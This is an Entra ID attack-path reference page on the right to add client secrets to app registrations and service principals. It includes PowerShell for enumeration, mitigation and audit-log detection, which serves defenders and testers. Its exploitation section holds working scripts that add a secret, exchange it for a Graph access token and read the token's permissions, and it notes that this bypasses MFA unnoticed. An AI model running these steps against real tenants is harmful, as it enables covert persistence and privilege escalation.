# AZ\_ADD\_SECRET

## Summary

|                               |                                                                                   |
| ----------------------------- | --------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**       | AZ\_ADD\_SECRET                                                                   |
| **Entra ID (Azure AD) Alias** | Add Secrets                                                                       |
| **Affected Object Types**     | App registrations & Service Principals                                            |
| **Exploitation Certainty**    | Certain                                                                           |
| **Graph Permission / Role**   | A principal holding **Application Administrator** or **Cloud Application Administrator** at tenant scope can add secrets to every Service Principal and App Registration in the tenant. A principal holding one of those roles scoped to a single object, or listed as an explicit **Owner** of a Service Principal or App Registration, can add secrets to that object only. **Global Administrator** carries the same rights tenant-wide. |

## Description

`AZ_ADD_SECRET` represents the ability for a principal (user, service principal, or group) to **add a new client secret / password credential** to an App Registration (application) or a Service Principal.

Adding a secret gives an attacker, or an identity the attacker controls, the ability to:

* Exchange the application's client id + secret for tokens via the OAuth 2.0 client-credentials grant and act as that application with every **application permission** granted to it. Delegated permissions are not directly usable with a secret alone (they require a user sign-in), but the secret lets the attacker act as the confidential client in those flows as well.
* If the application holds broad application permissions (for example `Directory.ReadWrite.All` or `RoleManagement.ReadWrite.Directory`), perform tenant-wide actions or escalate further.
* If the service principal represents infrastructure, cloud resources, or holds Azure RBAC role assignments, use the new secret to access production systems or pivot laterally.

Because a secret is a persistent credential that works from any network location, needs no interactive sign-in, and is never challenged by user MFA, the ability to add secrets is highly sensitive. Adding a secret also does not disturb the application's existing credentials, so the legitimate owner sees no breakage.

## Identification

### PowerShell

```powershell
# Connect first, e.g.:
#   Connect-MgGraph -Scopes "RoleManagement.Read.Directory","Application.Read.All","GroupMember.Read.All"
# Note: Get-MgDirectoryRole only returns roles that have been activated in the tenant; a role that has
# never had a member is absent from the results (and then has no members to report).

# Roles whose members can add secrets. Privileged Role Administrator cannot add secrets directly but
# can grant itself Application Administrator, so it is included.
$roles = @('Application Administrator','Cloud Application Administrator','Global Administrator','Privileged Role Administrator')

$roleMembers = foreach ($roleName in $roles) {
    $role = Get-MgDirectoryRole -Filter "displayName eq '$roleName'" -ErrorAction SilentlyContinue
    if (-not $role) { continue }
    # Direct members may be users, service principals or groups
    Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id -All -ErrorAction SilentlyContinue | ForEach-Object {
        $member = $_
        $type   = $member.AdditionalProperties.'@odata.type'
        if ($type -eq '#microsoft.graph.group') {
            # Expand the group, including nested groups, so every effective identity is listed
            Get-MgGroupTransitiveMember -GroupId $member.Id -All -ErrorAction SilentlyContinue | ForEach-Object {
                [pscustomobject]@{ Role = $roleName; ViaGroup = $member.AdditionalProperties.displayName; PrincipalType = $_.AdditionalProperties.'@odata.type'; DisplayName = $_.AdditionalProperties.displayName; UserPrincipalName = $_.AdditionalProperties.userPrincipalName; PrincipalId = $_.Id }
            }
        } else {
            [pscustomobject]@{ Role = $roleName; ViaGroup = $null; PrincipalType = $type; DisplayName = $member.AdditionalProperties.displayName; UserPrincipalName = $member.AdditionalProperties.userPrincipalName; PrincipalId = $member.Id }
        }
    }
}

# Owners of app registrations and of service principals (both object types accept secrets)
$appOwners = Get-MgApplication -All | ForEach-Object {
    $app = $_
    Get-MgApplicationOwner -ApplicationId $app.Id -All -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{ ObjectType = 'Application'; DisplayName = $app.DisplayName; AppId = $app.AppId; OwnerDisplayName = $_.AdditionalProperties.displayName; OwnerId = $_.Id }
    }
}
$spOwners = Get-MgServicePrincipal -All | ForEach-Object {
    $sp = $_
    Get-MgServicePrincipalOwner -ServicePrincipalId $sp.Id -All -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{ ObjectType = 'ServicePrincipal'; DisplayName = $sp.DisplayName; AppId = $sp.AppId; OwnerDisplayName = $_.AdditionalProperties.displayName; OwnerId = $_.Id }
    }
}

"=== PRINCIPALS WHO CAN ADD SECRETS (BY TENANT ROLES) ==="
$roleMembers | Sort-Object Role,DisplayName | Format-Table -AutoSize

"=== APPLICATION AND SERVICE PRINCIPAL OWNERS ==="
@($appOwners) + @($spOwners) | Sort-Object ObjectType,DisplayName,OwnerDisplayName | Format-Table -AutoSize
```

### Azure GUI

1. **Application owners who can add client secrets**
   1. Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**.
   2. Select the **target application** (the App Registration you want to assess).
   3. In the left menu of the application blade, go to **Owners**.
      * Anyone listed as **Owner** can go to **Certificates & secrets** for this app and add new **client secrets**. ![Ui Owners](/files/8AmWzSajTRCjP2MSUlto)
2. **Directory roles whose members can add client secrets**
   1. In **Microsoft Entra admin center**, go to **Roles & administrators**.
   2. Look for the following roles:
      * **Global Administrator (GA)**
      * **Privileged Role Administrator (PRA)** - cannot add secrets directly, but can assign itself (or anyone else) Application Administrator, so treat its members as able to add secrets
      * **Application Administrator**
      * **Cloud Application Administrator**
   3. Click each role -> open **Assignments**.
      * Any **user** or **service principal** assigned to one of these roles can add **client secrets** to App Registrations (including the target app), even if they are not listed as Owners.
      * If a **group** is assigned to one of these roles, enumerate the group's **transitive members** (including nested groups) to find all effective identities that can add secrets. ![Ui Azure Role Assignments](/files/B8X1mZ4bRIlifaf05mto)

## Exploitation

### PowerShell

```powershell
# Connect first with a scope that allows credential management, e.g.:
#   Connect-MgGraph -Scopes "Application.ReadWrite.All"
$appName     = "App Name here"
$description = "Added secret"

# Get the application by display name. Display names are not unique, so insist on exactly one match
# rather than silently passing an array of ids to Add-MgApplicationPassword.
$app = @(Get-MgApplication -Filter "displayName eq '$appName'")
if ($app.Count -ne 1) { throw "Expected exactly one application named '$appName', found $($app.Count)" }
$app = $app[0]

# Create password credential parameters (set an explicit expiry)
$passwordCredential = @{
    DisplayName = $description
    EndDateTime = (Get-Date).AddYears(1)
}

# Add the secret to the application. SecretText is returned only in this response and can never be
# read back afterwards, so capture it here.
$cred = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential $passwordCredential

Write-Host ""
Write-Host "Client (application) id:" $app.AppId
Write-Host "New client secret value:" $cred.SecretText
Write-Host "Description:" $description
Write-Host "Expires:" $cred.EndDateTime
```

![Exploitation Powershell](/files/QiZ0reIEsKmg4jmFbb3V)

### Azure GUI

* Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**.
* Select the **target application** you want to manage.
* In the left menu of the application blade, go to **Certificates & secrets**.
* Under **Client secrets**, click **+ New client secret**.
* Enter a **Description** for the secret.
* Choose the **Expiration** period (e.g., 3 months, 6 months, 12 months, or custom).
* Click **Add**.
* A new secret value will appear under **Value**.
  * **Copy the secret immediately** - you will not be able to see it again after leaving the page.

![Exploitation UI](/files/QIBWWzzBpSL7xy6MM23g)
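The exploitation script above targets an App Registration. A secret can equally be added to the Service Principal (enterprise application) object, which matters for multi-tenant apps whose registration lives in another tenant, and the payoff described in the Description section is exchanging client id + secret for a token. The following is an added example and is not code from the original page or from FSProtect; it assumes `Connect-MgGraph` has been run with `Application.ReadWrite.All`, and `$tenantId` and `$spName` are placeholders you replace.

```powershell
# Added example, not part of the original page. Placeholders: $tenantId, $spName.
$tenantId = "00000000-0000-0000-0000-000000000000"   # assumption: target tenant id
$spName   = "Service Principal Name here"            # assumption: enterprise app display name

# 1. Locate the service principal (the enterprise app object, not the app registration)
$sp = @(Get-MgServicePrincipal -Filter "displayName eq '$spName'")
if ($sp.Count -ne 1) { throw "Expected exactly one service principal named '$spName', found $($sp.Count)" }
$sp = $sp[0]

# 2. Add a password credential directly to the service principal. This works even when the
#    app registration belongs to another tenant, where you could not touch the application object.
$cred = Add-MgServicePrincipalPassword -ServicePrincipalId $sp.Id -PasswordCredential @{
    DisplayName = "Added secret"
    EndDateTime = (Get-Date).AddMonths(6)
}

# 3. Exchange client id + secret for an access token (OAuth 2.0 client-credentials grant).
#    No user, MFA or interactive sign-in is involved; this runs from any network location.
$tokenResponse = Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" `
    -ContentType "application/x-www-form-urlencoded" `
    -Body @{
        client_id     = $sp.AppId
        client_secret = $cred.SecretText
        scope         = "https://graph.microsoft.com/.default"
        grant_type    = "client_credentials"
    }

# 4. Decode the JWT payload (base64url) to see what the token lets the app do:
#    the "roles" claim lists the granted application permissions.
$payload = $tokenResponse.access_token.Split('.')[1].Replace('-','+').Replace('_','/')
switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
$claims  = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
"Token issued for appid $($claims.appid); application permissions (roles): $($claims.roles -join ', ')"
```

If the tenant enforces Conditional Access for workload identities, step 3 can be blocked by location or risk policies; user-targeted MFA never applies to this sign-in. An empty `roles` claim means the app holds no application permissions against Graph, but it may still hold Azure RBAC roles, which you would test with `scope = "https://management.azure.com/.default"`.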

## Mitigation

1. **Limit application owners who can add client secrets**
   1. Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**.
   2. Select the **target application**.
   3. In the left menu, go to **Owners**.
   4. Review the list of **Owners**:
      * Remove any identity that **does not need to manage secrets** for this app.
      * To remove: select the owner -> click **Remove**.
   5. Keep the owner list **as small as possible**:
      * Prefer a **dedicated admin group** (with tight membership) instead of many individual owners.
      * Avoid adding regular users or broad groups as owners.
2. **Limit directory roles whose members can add client secrets**
   1. In **Microsoft Entra admin center**, go to **Roles & administrators**.
   2. For each of the following roles:
      * **Global Administrator (GA)**
      * **Privileged Role Administrator (PRA)**
      * **Application Administrator**
      * **Cloud Application Administrator**
   3. Click the role -> open **Assignments**.
   4. Review all **users, service principals, and groups** assigned to the role:
      * Remove any assignment that **does not require** the ability to manage application credentials (including secrets).
      * To remove: select the assignment -> click **Remove assignment**.
   5. If a **group** is assigned to one of these roles:
      * Ensure the group's membership is **strictly controlled** (only admins who truly need app-management rights).
      * Avoid large or generic groups (e.g., "All IT", "Developers") being assigned to these roles.
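The owner and role reviews above reduce who holds the right; a tenant-wide control that makes the right unusable is the Entra **default app management policy**, which can refuse new password credentials on app registrations regardless of the caller's role. The following is an added example, not part of the original page or of FSProtect; it assumes `Connect-MgGraph` has been run with `Policy.ReadWrite.ApplicationConfiguration`, and the cut-off date and 90-day lifetime are assumptions you should replace with your own values.

```powershell
# Added example, not part of the original page. Assumes Policy.ReadWrite.ApplicationConfiguration.
$uri = "https://graph.microsoft.com/v1.0/policies/defaultAppManagementPolicy"

# Current state (isEnabled is false on a tenant that has never configured the policy)
$before = Invoke-MgGraphRequest -Method GET -Uri $uri
"Policy enabled before: $($before.isEnabled)"

# Block client-secret addition for app registrations created after the cut-off, and cap the
# lifetime of any secret that is still permitted. Certificates remain allowed, so legitimate
# workloads can migrate instead of breaking outright.
$cutoff = "2024-01-01T00:00:00Z"   # assumption: choose your own cut-off; omit the property to cover all apps
$body = @{
    isEnabled = $true
    applicationRestrictions = @{
        passwordCredentials = @(
            @{
                restrictionType                     = "passwordAddition"
                restrictForAppsCreatedAfterDateTime = $cutoff
            },
            @{
                restrictionType                     = "passwordLifetime"
                maxLifetime                         = "P90D"   # assumption: 90-day maximum
                restrictForAppsCreatedAfterDateTime = $cutoff
            }
        )
    }
}
Invoke-MgGraphRequest -Method PATCH -Uri $uri -ContentType "application/json" `
    -Body ($body | ConvertTo-Json -Depth 6)

# Verify the change
$after = Invoke-MgGraphRequest -Method GET -Uri $uri
"Policy enabled after: $($after.isEnabled); password restrictions: " +
    (($after.applicationRestrictions.passwordCredentials | ForEach-Object { $_.restrictionType }) -join ', ')
```

Once the policy is active, the `Add-MgApplicationPassword` call and the portal's **New client secret** button fail for the affected app registrations, including when the caller is Application Administrator or an owner. The default policy also carries a `servicePrincipalRestrictions` block for enterprise application objects; test the restriction on a non-production app first, because it will also stop legitimate secret rotation for apps that have not yet moved to certificates or managed identities.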

## Detection

**Use Entra Audit Logs to see who added a new client secret**

1. Open **Microsoft Entra admin center** -> **Identity** -> **Monitoring & health** -> **Audit logs**.
2. In the **Audit logs** view, set:
   * **Date** filter to the time window you want to investigate.
   * **Service** to **Core Directory** and **Category** to **ApplicationManagement**.
3. Use **Add filters** -> filter by:
   * **Activity**: look for
     * **"Update application - Certificates and secrets management"** (secret added to an App Registration)
     * **"Add service principal credentials"** (secret added directly to a Service Principal)
   * Optionally filter by **Target** (the specific application) if you know the app.
4. Open the relevant audit event(s):
   * Check the **Initiated by** field to see **which identity** added the secret: a user, or an application when the change was made with an app-only token (automation, or an attacker already holding another app's credential).
   * Check the **Target** to confirm the **App Registration / Service Principal** that received a new secret.
   * The event records that a credential was added (key id, display name, expiry) but never the secret value, so it cannot tell you whether the secret has been used. Correlate with the **Service principal sign-ins** view in the sign-in logs for client-credential sign-ins by that application after the addition, especially from unexpected locations.

![Detection Audit Logs](/files/leGxk6T5RTv5GlxNGiBs)

